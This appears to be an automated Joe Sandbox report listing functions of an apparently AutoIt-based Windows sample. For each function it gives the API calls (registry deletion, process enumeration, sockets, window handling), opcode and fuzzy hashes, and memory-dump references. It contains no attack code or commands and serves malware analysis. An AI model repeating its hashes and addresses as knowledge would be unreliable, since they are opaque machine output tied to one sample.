                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsncpy$LocalTime
                                                                        • String ID:
                                                                        • API String ID: 2945705084-0
                                                                        • Opcode ID: 647e375c695ac21a0b0a6a2e6f27ada7a3b1e7cb946247953de91a4c92f3c2c9
                                                                        • Instruction ID: a31948ce2b29791be0cac72729a0741effe726996d8846fafa76870d1916828b
                                                                        • Opcode Fuzzy Hash: 647e375c695ac21a0b0a6a2e6f27ada7a3b1e7cb946247953de91a4c92f3c2c9
                                                                        • Instruction Fuzzy Hash: F4418D66D10214BACF11EBF488469CFB3EDEF44310F50A9A6E515F3122FA34E61483A9
                                                                        Function 00ED3D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00ED3DA1
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00ED3DCB
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00ED3E80
                                                                          • Part of subcall function 00ED3D72: RegCloseKey.ADVAPI32(?), ref: 00ED3DE8
                                                                          • Part of subcall function 00ED3D72: FreeLibrary.KERNEL32(?), ref: 00ED3E3A
                                                                          • Part of subcall function 00ED3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00ED3E5D
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00ED3E25
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                        • String ID:
                                                                        • API String ID: 395352322-0
                                                                        • Opcode ID: 93aa08a70d862625a9d60461d15e5e540711029bb79272e40e3cf297b4bad2de
                                                                        • Instruction ID: 8995bf76b340ad8c905965560eafc7b3b9f898ee931f637ac3fc9a29129434af
                                                                        • Opcode Fuzzy Hash: 93aa08a70d862625a9d60461d15e5e540711029bb79272e40e3cf297b4bad2de
                                                                        • Instruction Fuzzy Hash: 9D310DB1901209BFDB159BA1DC85AFFBBBDEF48304F00116AE512F2290DA709F49DB61
                                                                        Function 00ED8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00ED8FE7
                                                                        • GetWindowLongW.USER32(015DEC60,000000F0), ref: 00ED901A
                                                                        • GetWindowLongW.USER32(015DEC60,000000F0), ref: 00ED904F
                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00ED9081
                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00ED90AB
                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00ED90BC
                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00ED90D6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: LongWindow$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 2178440468-0
                                                                        • Opcode ID: f97e3454413b6cceeb825a32fd6bfbd39ac73aa06e1078033c9dfe21941a1783
                                                                        • Instruction ID: bc0912be71e17eeb2bf416654a7e6c8f9d0054dac3a4315d4accabfc7aef4cb8
                                                                        • Opcode Fuzzy Hash: f97e3454413b6cceeb825a32fd6bfbd39ac73aa06e1078033c9dfe21941a1783
                                                                        • Instruction Fuzzy Hash: ED314834604214DFDB218F98EC85F6437A6FB8A328F155266F519EB2B2CB71AC45EB40
                                                                        Function 00EB08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EB08F2
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EB0918
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00EB091B
                                                                        • SysAllocString.OLEAUT32(?), ref: 00EB0939
                                                                        • SysFreeString.OLEAUT32(?), ref: 00EB0942
                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00EB0967
                                                                        • SysAllocString.OLEAUT32(?), ref: 00EB0975
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                        • String ID:
                                                                        • API String ID: 3761583154-0
                                                                        • Opcode ID: 31e051710f5f63ec333d9058b7ade1ff2d3bf48415438c4b258b86e9363a7602
                                                                        • Instruction ID: 0ec0abde601afd08b97ee6279e4e89de360cf0c732c265924439d460891e8c6c
                                                                        • Opcode Fuzzy Hash: 31e051710f5f63ec333d9058b7ade1ff2d3bf48415438c4b258b86e9363a7602
                                                                        • Instruction Fuzzy Hash: 6721A172605208AFEB109FA9CC88DFF77ACEB88364B008125F919EB151D670ED45CB60
                                                                        Function 00EB2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                        • API String ID: 1038674560-2734436370
                                                                        • Opcode ID: 423b8dc91f224305163b3c41508b4a9728dbcd69c4fca79e7b1d828c72c477dd
                                                                        • Instruction ID: fbfab2f52026688c4586daa3eac3b0350071759859f2401d15cc959e5b5a9e38
                                                                        • Opcode Fuzzy Hash: 423b8dc91f224305163b3c41508b4a9728dbcd69c4fca79e7b1d828c72c477dd
                                                                        • Instruction Fuzzy Hash: 432167322012116BC630AA649C02FFB73D9EF69304F60642DF64AB7081E6659942E3A2
                                                                        Function 00EB0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EB09CB
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EB09F1
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00EB09F4
                                                                        • SysAllocString.OLEAUT32 ref: 00EB0A15
                                                                        • SysFreeString.OLEAUT32 ref: 00EB0A1E
                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 00EB0A38
                                                                        • SysAllocString.OLEAUT32(?), ref: 00EB0A46
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                        • String ID:
                                                                        • API String ID: 3761583154-0
                                                                        • Opcode ID: 06ec16704a6b2091f479f61bfa492fbe378912de8f0e975119a2a4b8facc70c9
                                                                        • Instruction ID: 3d94cd14bf9385b7292f00a46f280fdb56197c7f345a1aee35e78fbe0f94ede0
                                                                        • Opcode Fuzzy Hash: 06ec16704a6b2091f479f61bfa492fbe378912de8f0e975119a2a4b8facc70c9
                                                                        • Instruction Fuzzy Hash: F3216075204204AFDB10DBA9DC89DBF77ECEF483607408525F919EB2A1E670ED45CB64
                                                                        Function 00EDA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E8D1BA
                                                                          • Part of subcall function 00E8D17C: GetStockObject.GDI32(00000011), ref: 00E8D1CE
                                                                          • Part of subcall function 00E8D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E8D1D8
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00EDA32D
                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00EDA33A
                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00EDA345
                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00EDA354
                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00EDA360
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                        • String ID: Msctls_Progress32
                                                                        • API String ID: 1025951953-3636473452
                                                                        • Opcode ID: 2b80500e68cce8860ba7e2a61c74b3af80eb2d4a843ca0a9e1610a9fd4ba822e
                                                                        • Instruction ID: f33ad7009a3d916543f18e865f0ef4ccd85d77616e15b499e32c9f773fc57025
                                                                        • Opcode Fuzzy Hash: 2b80500e68cce8860ba7e2a61c74b3af80eb2d4a843ca0a9e1610a9fd4ba822e
                                                                        • Instruction Fuzzy Hash: D51193B1150219BEEF115F60CC85EEB7F6EFF08798F015115BA08A61A0C6729C22DBA4
                                                                        Function 00E8CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetClientRect.USER32(?,?), ref: 00E8CCF6
                                                                        • GetWindowRect.USER32(?,?), ref: 00E8CD37
                                                                        • ScreenToClient.USER32(?,?), ref: 00E8CD5F
                                                                        • GetClientRect.USER32(?,?), ref: 00E8CE8C
                                                                        • GetWindowRect.USER32(?,?), ref: 00E8CEA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Client$Window$Screen
                                                                        • String ID:
                                                                        • API String ID: 1296646539-0
                                                                        • Opcode ID: c10cb005d563e48bbd06842a41d2e800afde146745affd4b02355790d932900c
                                                                        • Instruction ID: ce6791ac1f90256404fe57a1c83ea62a3d3c9aa94be41edf9a8f98dac4b4aa4b
                                                                        • Opcode Fuzzy Hash: c10cb005d563e48bbd06842a41d2e800afde146745affd4b02355790d932900c
                                                                        • Instruction Fuzzy Hash: EFB14779900649DBDB10DFA9C5807EEBBB1FF09314F24A12AEC5DEB250DB30A950CB64
                                                                        Function 00ED1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00ED1C18
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00ED1C26
                                                                        • __wsplitpath.LIBCMT ref: 00ED1C54
                                                                          • Part of subcall function 00E91DFC: __wsplitpath_helper.LIBCMT ref: 00E91E3C
                                                                        • _wcscat.LIBCMT ref: 00ED1C69
                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00ED1CDF
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00ED1CF1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                        • String ID:
                                                                        • API String ID: 1380811348-0
                                                                        • Opcode ID: 1a61af18707169c25ce50459b775bb1b51d0a2bfa19133dfbddbd431678b44ec
                                                                        • Instruction ID: 4b75fb6c12332eb61976decca522080109383dd5579e98ede558d6f642c57496
                                                                        • Opcode Fuzzy Hash: 1a61af18707169c25ce50459b775bb1b51d0a2bfa19133dfbddbd431678b44ec
                                                                        • Instruction Fuzzy Hash: BC516E71108340AFD720EF24CC85EABB7ECEF88754F10595EF589A7251EB70AA05CB92
                                                                        Function 00ED2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00ED3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00ED2BB5,?,?), ref: 00ED3C1D
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ED30AF
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00ED30EF
                                                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00ED3112
                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00ED313B
                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00ED317E
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00ED318B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                        • String ID:
                                                                        • API String ID: 3451389628-0
                                                                        • Opcode ID: 7fc8407e062fd85e7f02d357acd107b45fd273b937bb6a461cab1316f63a801a
                                                                        • Instruction ID: f710fbe1c72f294437de6b733474fe820e45bb92165c7693bf1ff21e1a65432c
                                                                        • Opcode Fuzzy Hash: 7fc8407e062fd85e7f02d357acd107b45fd273b937bb6a461cab1316f63a801a
                                                                        • Instruction Fuzzy Hash: 91513A31108200AFC714EF64CC95E6ABBF9FF89304F04995EF599A72A1DB71DA06CB52
                                                                        Function 00ED84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetMenu.USER32(?), ref: 00ED8540
                                                                        • GetMenuItemCount.USER32(00000000), ref: 00ED8577
                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00ED859F
                                                                        • GetMenuItemID.USER32(?,?), ref: 00ED860E
                                                                        • GetSubMenu.USER32(?,?), ref: 00ED861C
                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 00ED866D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountMessagePostString
                                                                        • String ID:
                                                                        • API String ID: 650687236-0
                                                                        • Opcode ID: 361525bed7f9bc463e272c7ce17af70564a82f40c4f9c27e90303c772e46acd7
                                                                        • Instruction ID: ecb433ccaec48627437611e7f33e5932da4b73c829790027914723f2b75828d6
                                                                        • Opcode Fuzzy Hash: 361525bed7f9bc463e272c7ce17af70564a82f40c4f9c27e90303c772e46acd7
                                                                        • Instruction Fuzzy Hash: 46518E75A00215AFCF11EF68C941AEEBBF5EF48320F10549AE915BB351CB70AE42CB90
                                                                        Function 00EB4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00EB4B10
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EB4B5B
                                                                        • IsMenu.USER32(00000000), ref: 00EB4B7B
                                                                        • CreatePopupMenu.USER32 ref: 00EB4BAF
                                                                        • GetMenuItemCount.USER32(000000FF), ref: 00EB4C0D
                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00EB4C3E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                        • String ID:
                                                                        • API String ID: 3311875123-0
                                                                        • Opcode ID: dc9027f2e5149f64b985cc2b7d8daac971a9891f9cfeeaa4270dec7b7ea73b6e
                                                                        • Instruction ID: f1e1dcf3ef9d4000874a409879ba287a25614616b2c8116ff0beafb24c879f17
                                                                        • Opcode Fuzzy Hash: dc9027f2e5149f64b985cc2b7d8daac971a9891f9cfeeaa4270dec7b7ea73b6e
                                                                        • Instruction Fuzzy Hash: B951CBB0601209EFEF20CF68C988BEEBFF4AF44718F145159E555BA2D2E3709944CB51
                                                                        Function 00EC8DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00F0DC00), ref: 00EC8E7C
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EC8E89
                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00EC8EAD
                                                                        • #16.WSOCK32(?,?,00000000,00000000), ref: 00EC8EC5
                                                                        • _strlen.LIBCMT ref: 00EC8EF7
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00EC8F6A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$_strlenselect
                                                                        • String ID:
                                                                        • API String ID: 2217125717-0
                                                                        • Opcode ID: 34a38be9607c4b541d5d6e8c560684fcdcde311cd552df63be290894599c7468
                                                                        • Instruction ID: 2d962b724bda5c8ef4882eac04fd4255dc021ba2e670ae943453b32993fc9b43
                                                                        • Opcode Fuzzy Hash: 34a38be9607c4b541d5d6e8c560684fcdcde311cd552df63be290894599c7468
                                                                        • Instruction Fuzzy Hash: 5D41A071600108AFCB14EBA4CE85FAEB7FAAF48314F10515DF51AB7291DB30AE01CB60
                                                                        Function 00E8ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00E8B34E: GetWindowLongW.USER32(?,000000EB), ref: 00E8B35F
                                                                        • BeginPaint.USER32(?,?,?), ref: 00E8AC2A
                                                                        • GetWindowRect.USER32(?,?), ref: 00E8AC8E
                                                                        • ScreenToClient.USER32(?,?), ref: 00E8ACAB
                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E8ACBC
                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 00E8AD06
                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00EEE673
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                        • String ID:
                                                                        • API String ID: 2592858361-0
                                                                        • Opcode ID: cd11ba31d22e83220724c6ce8555aa35f1814fd74bc13d2568fea7e8f8ee5dce
                                                                        • Instruction ID: 09f463932eb44c06aa9d119be98140f6939e2fcf934597bdf91a278c83f2d8cb
                                                                        • Opcode Fuzzy Hash: cd11ba31d22e83220724c6ce8555aa35f1814fd74bc13d2568fea7e8f8ee5dce
                                                                        • Instruction Fuzzy Hash: 6941DE701043059FD710EF65CC85FB67BE9FB59324F08122AF9A8A72A1C330A844DB62
                                                                        Function 00EDE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ShowWindow.USER32(00F31628,00000000,00F31628,00000000,00000000,00F31628,?,00EEDC5D,00000000,?,00000000,00000000,00000000,?,00EEDAD1,00000004), ref: 00EDE40B
                                                                        • EnableWindow.USER32(00000000,00000000), ref: 00EDE42F
                                                                        • ShowWindow.USER32(00F31628,00000000), ref: 00EDE48F
                                                                        • ShowWindow.USER32(00000000,00000004), ref: 00EDE4A1
                                                                        • EnableWindow.USER32(00000000,00000001), ref: 00EDE4C5
                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00EDE4E8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
